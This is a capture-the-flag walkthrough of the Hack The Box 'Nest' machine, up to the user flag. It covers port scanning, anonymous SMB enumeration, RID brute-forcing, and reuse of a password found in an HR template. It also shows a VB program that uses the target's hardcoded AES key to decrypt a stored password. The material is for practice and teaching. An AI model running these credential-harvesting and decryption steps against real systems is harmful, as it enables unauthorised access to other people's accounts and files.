Nest
Port scan
u505@naos:~/HTB/Machines/Nest$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.178 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-12-27 13:46:38 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 4386/tcp on 10.10.10.178 Discovered open port 445/tcp on 10.10.10.178
u505@naos:~/HTB/Machines/Nest$ nmap -sC -sV 10.10.10.178 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:46 EST Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.39 seconds
Nmap think that the machine is down. We can force the scan with the parameter -Pn
u505@naos:~/HTB/Machines/Nest$ nmap -Pn -sC -sV nest Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:47 EST Nmap scan report for nest (10.10.10.178) Host is up (0.038s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 445/tcp open microsoft-ds?
Host script results: |_clock-skew: 8m02s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-12-27T13:56:20 |_ start_date: 2020-12-27T13:49:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.92 seconds
An alternative to the -Pn switch is to use nmap as super user, it will enable the ICMP probing.
Nmap search for a response on port 80 or 443. But the server doesn't respond (firewall drop?). If the scan is launched with sudo, nmap try a ping too.
u505@naos:~/HTB/Machines/Nest$ sudo nmap -sC -sV 10.10.10.178 [sudo] password for u505: Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:47 EST Nmap scan report for nest (10.10.10.178) Host is up (0.038s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 445/tcp open microsoft-ds?
Host script results: |_clock-skew: 8m02s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-12-27T13:56:05 |_ start_date: 2020-12-27T13:49:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.52 seconds
u505@naos:~/HTB/Machines/Nest$ sudo nmap -p 445,4386 -sC -sV 10.10.10.178 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 09:01 EST Nmap scan report for nest (10.10.10.178) Host is up (0.038s latency).
PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port4386-TCP:V=7.91%I=7%D=12/27%Time=5FE893C3%P=x86_64-pc-linux-gnu%r(N SF:ULL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLi SF:nes,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognis SF:ed\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x SF:20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comm SF:and\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Rep SF:orting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQ SF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21, SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows SF:\x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20t SF:he\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20-- SF:-\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r SF:\nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\ SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCook SF:ie,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSession SF:Req,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos, SF:21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21 SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3 SF:A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x2 SF:0command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\. SF:2\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\ SF:.2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\. SF:2\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\ SF:r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20 SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>");
Host script results: |_clock-skew: 8m02s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-12-27T14:12:15 |_ start_date: 2020-12-27T13:49:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 199.13 seconds
The port 4386 seems to have an handmade service.
u505@naos:~/HTB/Machines/Nest$ telnet nest 4386 Trying 10.10.10.178... Connected to nest. Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> >quit
Was it something I said? Connection closed by foreign host.
Unauthenticated enumeration
u505@naos:~/HTB/Machines/Nest$ smbmap -H 10.10.10.178 [+] IP: 10.10.10.178:445 Name: nest
u505@naos:~/HTB/Machines/Nest$ smbmap -u anonymous -H 10.10.10.178
[+] Guest session IP: 10.10.10.178:445 Name: nest
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
Secure$ NO ACCESS
Users READ ONLY
There are 2 shares available unauthenticated.
u505@naos:~/HTB/Machines/Nest$ enum4linux 10.10.10.178
Enum4linux doesn't provide any useful information.
u505@naos:~/HTB/Machines/Nest$ crackmapexec smb 10.10.10.178/32
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
The OS seems to be a Windows 7, Service Pack 1 or Windows Server 2008 R2, Service Pack 1.
u505@naos:~/HTB/Machines/Nest$ sudo crackmapexec smb 10.10.10.178/32 -u 'u505' -p abc --shares [sudo] password for u505: SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False) SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\u505:abc SMB 10.10.10.178 445 HTB-NEST [+] Enumerated shares SMB 10.10.10.178 445 HTB-NEST Share Permissions Remark SMB 10.10.10.178 445 HTB-NEST ----- ----------- ------ SMB 10.10.10.178 445 HTB-NEST ADMIN$ Remote Admin SMB 10.10.10.178 445 HTB-NEST C$ Default share SMB 10.10.10.178 445 HTB-NEST Data READ SMB 10.10.10.178 445 HTB-NEST IPC$ Remote IPC SMB 10.10.10.178 445 HTB-NEST Secure$ SMB 10.10.10.178 445 HTB-NEST Users READ
crackmapexec provides the same shares information.
Users
u505@naos:~/HTB/Machines/Nest$ python3 /opt/utils/impacket/examples/lookupsid.py u505:abc@10.10.10.178 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.10.178 [*] StringBinding ncacn_np:10.10.10.178[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-3904039239-3573887098-1598508871 500: HTB-NEST\Administrator (SidTypeUser) 501: HTB-NEST\Guest (SidTypeUser) 513: HTB-NEST\None (SidTypeGroup) 1002: HTB-NEST\TempUser (SidTypeUser) 1004: HTB-NEST\C.Smith (SidTypeUser) 1005: HTB-NEST\Service_HQK (SidTypeUser)
3 users and administrator are enumerated.
u505@naos:~/HTB/Machines/Nest$ crackmapexec smb 10.10.10.178/32 -u 'u505' -p abc --rid-brute SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False) SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\u505:abc SMB 10.10.10.178 445 HTB-NEST [+] Brute forcing RIDs SMB 10.10.10.178 445 HTB-NEST 500: HTB-NEST\Administrator (SidTypeUser) SMB 10.10.10.178 445 HTB-NEST 501: HTB-NEST\Guest (SidTypeUser) SMB 10.10.10.178 445 HTB-NEST 513: HTB-NEST\None (SidTypeGroup) SMB 10.10.10.178 445 HTB-NEST 1002: HTB-NEST\TempUser (SidTypeUser) SMB 10.10.10.178 445 HTB-NEST 1004: HTB-NEST\C.Smith (SidTypeUser) SMB 10.10.10.178 445 HTB-NEST 1005: HTB-NEST\Service_HQK (SidTypeUser)
Crackmapexec provides the same information.
Files enumeration
Mount shares
u505@naos:~/HTB/Machines/Nest$ mkdir -p mnt/data mnt/secure mnt/users u505@naos:~/HTB/Machines/Nest$ cd mnt/ u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data đ Password for root@//10.10.10.178/data: ***** u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users đ Password for root@//10.10.10.178/users: *****
Search accessible files
u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: â./data/ITâ: Permission denied
find: â./data/Productionâ: Permission denied
find: â./data/Reportsâ: Permission denied
-rwxr-xr-x 1 root root 48 Aug 5 2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug 7 2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: â./users/Administratorâ: Permission denied
find: â./users/C.Smithâ: Permission denied
find: â./users/L.Frostâ: Permission denied
find: â./users/R.Thompsonâ: Permission denied
find: â./users/TempUserâ: Permission denied
u505@naos:~/HTB/Machines/Nest/mnt$ cat "./data/Shared/Maintenance/Maintenance Alerts.txt" There is currently no scheduled maintenance work
In the next file, it seems there are credentials for user TempUser.
u505@naos:~/HTB/Machines/Nest/mnt$ cat "./data/Shared/Templates/HR/Welcome Email.txt" We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.
Username: TempUser Password: welcome2019
Thank you HR
Enumeration with user TempUser
u505@naos:~/HTB/Machines/Nest/mnt$ smbmap -u TempUser -p welcome2019 -H 10.10.10.178
[+] IP: 10.10.10.178:445 Name: nest
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
Secure$ READ ONLY
Users READ ONLY
With the user TempUser the hidden share Secure$ is available.
u505@naos:~/HTB/Machines/Nest/mnt$ sudo crackmapexec smb 10.10.10.178/32 -u TempUser -p welcome2019 --shares SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False) SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\TempUser:welcome2019 SMB 10.10.10.178 445 HTB-NEST [+] Enumerated shares SMB 10.10.10.178 445 HTB-NEST Share Permissions Remark SMB 10.10.10.178 445 HTB-NEST ----- ----------- ------ SMB 10.10.10.178 445 HTB-NEST ADMIN$ Remote Admin SMB 10.10.10.178 445 HTB-NEST C$ Default share SMB 10.10.10.178 445 HTB-NEST Data READ SMB 10.10.10.178 445 HTB-NEST IPC$ Remote IPC SMB 10.10.10.178 445 HTB-NEST Secure$ READ SMB 10.10.10.178 445 HTB-NEST Users READ
Crackmapexec provides the same information.
Files enumeration
Unmount unauthenticated shares.
u505@naos:~/HTB/Machines/Nest/mnt$ sudo umount data users
Mount shares with TempUser
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data -o "username=TempUser,password=welcome2019" u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users -o "username=TempUser,password=welcome2019" u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/secure$ secure -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: â./secure/Financeâ: Permission denied
find: â./secure/HRâ: Permission denied
find: â./secure/ITâ: Permission denied
-rwxr-xr-x 1 root root 246 Aug 3 2019 ./data/IT/Configs/Adobe/editing.xml
-rwxr-xr-x 1 root root 0 Oct 10 2011 ./data/IT/Configs/Adobe/Options.txt
-rwxr-xr-x 1 root root 258 Jan 8 2013 ./data/IT/Configs/Adobe/projects.xml
-rwxr-xr-x 1 root root 1274 Aug 7 2019 ./data/IT/Configs/Adobe/settings.xml
-rwxr-xr-x 1 root root 1369 Jun 11 2003 ./data/IT/Configs/Atlas/Temp.XML
-rwxr-xr-x 1 root root 4598 Mar 3 2012 ./data/IT/Configs/Microsoft/Options.xml
-rwxr-xr-x 1 root root 6451 Aug 7 2019 ./data/IT/Configs/NotepadPlusPlus/config.xml
-rwxr-xr-x 1 root root 2108 Aug 7 2019 ./data/IT/Configs/NotepadPlusPlus/shortcuts.xml
-rwxr-xr-x 1 root root 270 Aug 8 2019 './data/IT/Configs/RU Scanner/RU_config.xml'
-rwxr-xr-x 1 root root 48 Aug 5 2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug 7 2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: â./users/Administratorâ: Permission denied
find: â./users/C.Smithâ: Permission denied
find: â./users/L.Frostâ: Permission denied
find: â./users/R.Thompsonâ: Permission denied
-rwxr-xr-x 1 root root 0 Aug 7 2019 './users/TempUser/New Text Document.txt'
In the NotepadPluPlus file config file, in the history there is a file in the IT/Carl folder.
u505@naos:~/HTB/Machines/Nest/mnt$ tail ./data/IT/Configs/NotepadPlusPlus/config.xml
<Find name="redeem on" />
<Find name="192" />
<Replace name="C_addEvent" />
</FindHistory>
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
</NotepadPlus>
There is a file RU_config, that seems to contains c.smith credentials to access a LDAP (AD?).
u505@naos:~/HTB/Machines/Nest/mnt$ cat './data/IT/Configs/RU Scanner/RU_config.xml' <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password> </ConfigFile>
But these credentials seem to be encrypted.
u505@naos:~/HTB/Machines/Nest/mnt$ echo fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= | base64 -d | xxd 00000000: 7d31 3301 f603 a33d 58ce 4aa1 4241 fa19 }13....=X.J.BA.. 00000010: 0158 2a9d 5763 9866 edb8 ce3f ceb2 6311 .X*.Wc.f...?..c.
When we tried to list the IT folder, it raises a permissions denied, but the subfolder Carl is accessible.
u505@naos:~/HTB/Machines/Nest/mnt$ cd secure/IT/Carl
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ find . -type f -exec ls -l {} \;
-rwxr-xr-x 1 root root 56 Aug 7 2019 ./Docs/ip.txt
-rwxr-xr-x 1 root root 73 Aug 7 2019 ./Docs/mmc.txt
-rwxr-xr-x 1 root root 772 Aug 7 2019 './VB Projects/WIP/RU/RUScanner/ConfigFile.vb'
-rwxr-xr-x 1 root root 279 Aug 7 2019 './VB Projects/WIP/RU/RUScanner/Module1.vb'
-rwxr-xr-x 1 root root 441 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb'
-rwxr-xr-x 1 root root 481 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Application.myapp'
-rwxr-xr-x 1 root root 1163 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb'
-rwxr-xr-x 1 root root 2776 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb'
-rwxr-xr-x 1 root root 5612 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Resources.resx'
-rwxr-xr-x 1 root root 2989 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb'
-rwxr-xr-x 1 root root 279 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Settings.settings'
-rwxr-xr-x 1 root root 4828 Aug 9 2019 './VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj'
-rwxr-xr-x 1 root root 143 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user'
-rwxr-xr-x 1 root root 133 Aug 7 2019 './VB Projects/WIP/RU/RUScanner/SsoIntegration.vb'
-rwxr-xr-x 1 root root 4888 Aug 7 2019 './VB Projects/WIP/RU/RUScanner/Utils.vb'
-rwxr-xr-x 1 root root 871 Aug 6 2019 './VB Projects/WIP/RU/RUScanner.sln'
The file utils.vb contains code with a decryption function.
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ cat './VB Projects/WIP/RU/RUScanner/Utils.vb' Imports System.Text Imports System.Security.Cryptography Public Class Utils
Public Shared Function GetLogFilePath() As String Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt") End Function
Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function EncryptString(PlainString As String) As String If String.IsNullOrEmpty(PlainString) Then Return String.Empty Else Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function Encrypt(ByVal plainText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue) Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes) Using memoryStream As New IO.MemoryStream() Using cryptoStream As New CryptoStream(memoryStream, _ encryptor, _ CryptoStreamMode.Write) cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length) cryptoStream.FlushFinalBlock() Dim cipherTextBytes As Byte() = memoryStream.ToArray() memoryStream.Close() cryptoStream.Close() Return Convert.ToBase64String(cipherTextBytes) End Using End Using End Function
Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
Return plainText End Function
End Class
User Flag
Create VB to decrypt password
Dotnet environment variables
u505@naos:/opt/utils/dotnet$ export DOTNET_ROOT=/opt/utils/dotnet u505@naos:/opt/utils/dotnet$ export PATH=$PATH:$DOTNET_ROOT
Creation of a console VB project.
u505@naos:~/HTB/Machines/Nest$ mkdir VBu505 u505@naos:~/HTB/Machines/Nest$ cd VBu505 u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet new console -lang vb The template "Console Application" was created successfully.
Processing post-creation actions... Running 'dotnet restore' on /opt/HTB/Machines/Nest/VBu505/VBu505.vbproj... Determining projects to restore... Restored /opt/HTB/Machines/Nest/VBu505/VBu505.vbproj (in 131 ms).
Restore succeeded.
An update for template pack Microsoft.DotNet.Common.ProjectTemplates.3.1::3.1.10 is available. install command: dotnet new -i Microsoft.DotNet.Common.ProjectTemplates.3.1::5.0.0
Inspired on the source code found previously, I created a decrypt function to decrypt the password.
u505@naos:~/HTB/Machines/Nest/VBu505$ cat Program.vb Imports System Imports System.Text Imports System.Security.Cryptography Public Class Utils
Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
Return plainText End Function
End Class
Module Program Sub Main(args As String()) Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")) End Sub End Module
We run the VB
u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet run
xRxRxPANCAK3SxRxRx
The user and password are accepted, the 3 shares are available.
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ smbmap -u c.smith -p xRxRxPANCAK3SxRxRx -H 10.10.10.178
[+] IP: 10.10.10.178:445 Name: nest
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
Secure$ READ ONLY
Users READ ONLY
crackmapexec confirms it too.
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ sudo crackmapexec smb 10.10.10.178/32 -u c.smith -p xRxRxPANCAK3SxRxRx --shares
[sudo] password for u505:
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\c.smith:xRxRxPANCAK3SxRxRx
SMB 10.10.10.178 445 HTB-NEST [+] Enumerated shares
SMB 10.10.10.178 445 HTB-NEST Share Permissions Remark
SMB 10.10.10.178 445 HTB-NEST ----- ----------- ------
SMB 10.10.10.178 445 HTB-NEST ADMIN$ Remote Admin
SMB 10.10.10.178 445 HTB-NEST C$ Default share
SMB 10.10.10.178 445 HTB-NEST Data READ
SMB 10.10.10.178 445 HTB-NEST IPC$ Remote IPC
SMB 10.10.10.178 445 HTB-NEST Secure$ READ
SMB 10.10.10.178 445 HTB-NEST Users READ
Files enumeration
Mount shares as c.smith
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ cd .. u505@naos:~/HTB/Machines/Nest/mnt/secure/IT$ cd .. u505@naos:~/HTB/Machines/Nest/mnt/secure$ cd .. u505@naos:~/HTB/Machines/Nest/mnt$ sudo umount data secure users u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data -o "username=c.smith,password=xRxRxPANCAK3SxRxRx" u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users -o "username=c.smith,password=xRxRxPANCAK3SxRxRx" u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/secure$ secure -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"
Check files available
u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: â./secure/Financeâ: Permission denied
find: â./secure/HRâ: Permission denied
find: â./secure/ITâ: Permission denied
-rwxr-xr-x 1 root root 246 Aug 3 2019 ./data/IT/Configs/Adobe/editing.xml
-rwxr-xr-x 1 root root 0 Oct 10 2011 ./data/IT/Configs/Adobe/Options.txt
-rwxr-xr-x 1 root root 258 Jan 8 2013 ./data/IT/Configs/Adobe/projects.xml
-rwxr-xr-x 1 root root 1274 Aug 7 2019 ./data/IT/Configs/Adobe/settings.xml
-rwxr-xr-x 1 root root 1369 Jun 11 2003 ./data/IT/Configs/Atlas/Temp.XML
-rwxr-xr-x 1 root root 4598 Mar 3 2012 ./data/IT/Configs/Microsoft/Options.xml
-rwxr-xr-x 1 root root 6451 Aug 7 2019 ./data/IT/Configs/NotepadPlusPlus/config.xml
-rwxr-xr-x 1 root root 2108 Aug 7 2019 ./data/IT/Configs/NotepadPlusPlus/shortcuts.xml
-rwxr-xr-x 1 root root 270 Aug 8 2019 './data/IT/Configs/RU Scanner/RU_config.xml'
-rwxr-xr-x 1 root root 48 Aug 5 2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug 7 2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: â./users/Administratorâ: Permission denied
-rwxr-xr-x 1 root root 17408 Aug 7 2019 './users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe'
-rwxr-xr-x 1 root root 0 Aug 8 2019 './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
-rwxr-xr-x 1 root root 249 Aug 8 2019 './users/C.Smith/HQK Reporting/HQK_Config_Backup.xml'
-rwxr-xr-x 1 root root 32 Aug 8 2019 ./users/C.Smith/user.txt
find: â./users/L.Frostâ: Permission denied
find: â./users/R.Thompsonâ: Permission denied
find: â./users/TempUserâ: Permission denied
User flag
u505@naos:~/HTB/Machines/Nest/mnt$ cat ./users/C.Smith/user.txt <USER_FLAG>
Other important files
There is an executable file. It is an .Net assembly.
